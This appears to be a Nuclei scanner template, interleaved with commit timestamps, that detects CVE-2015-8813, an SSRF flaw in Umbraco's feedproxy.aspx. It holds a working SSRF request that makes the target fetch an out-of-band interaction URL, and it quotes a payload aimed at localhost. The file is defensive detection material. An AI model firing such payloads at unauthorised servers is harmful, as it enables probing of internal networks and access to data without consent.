2021-06-28 11:44:03 +00:00
id : CVE-2015-8813
info :
2022-06-09 20:35:21 +00:00
name : Umbraco <7.4.0- Server-Side Request Forgery
2021-06-28 11:44:03 +00:00
author : emadshanab
severity : high
2022-06-09 20:35:21 +00:00
description : Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
2023-09-27 15:51:13 +00:00
impact : |
The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
2021-08-19 12:30:14 +00:00
reference :
2021-06-28 11:44:03 +00:00
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
2022-05-17 09:18:12 +00:00
- https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
- http://www.openwall.com/lists/oss-security/2016/02/18/8
2023-07-11 19:49:27 +00:00
- http://issues.umbraco.org/issue/U4-7457
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 8.2
2021-09-10 11:26:40 +00:00
cve-id : CVE-2015-8813
cwe-id : CWE-918
2023-07-11 19:49:27 +00:00
epss-score : 0.00511
2024-01-29 17:11:14 +00:00
epss-percentile : 0.74145
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : umbraco
product : umbraco
2024-01-14 09:21:50 +00:00
tags : cve2015,cve,ssrf,oast,umbraco
2021-06-28 11:44:03 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-28 11:44:03 +00:00
- method : GET
path :
- "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-06-28 11:44:03 +00:00
words :
2022-01-04 19:34:16 +00:00
- "http"
2024-01-30 06:46:18 +00:00
# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950